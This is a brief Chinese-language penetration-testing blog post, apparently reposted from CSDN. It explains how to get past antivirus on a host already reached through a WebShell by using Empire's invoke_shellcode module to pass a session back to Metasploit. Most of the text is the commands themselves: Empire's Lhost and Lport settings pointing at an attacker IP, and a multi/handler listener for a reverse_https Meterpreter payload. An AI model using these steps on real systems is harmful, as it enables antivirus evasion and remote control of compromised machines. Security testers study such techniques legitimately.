转载请注明出处:https://blog.csdn.net/l1028386804/article/details/86178038
在实际渗透中,当拿到WebShell上传的MSF客户端无法绕过目标主机的杀毒软件时,可以使用PowerShell来绕过,也可以执行Empire的Payload来绕过,成功之后再使用Empiore的模块将其反弹回Metasploit。
这里使用Empire的usemodule code_execution/invoke_shellcode模块修改两个参数:Lhost、Lport。将Lhost修改为MSF所在主机的IP,按以下命令设置:
set Lhost 192.168.31.247
set Lport 4444
在MSF上设置监听,命令如下:
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 192.168.31.247
set lport 4444
run
运行后,就可以收到Empire反弹回来的Shell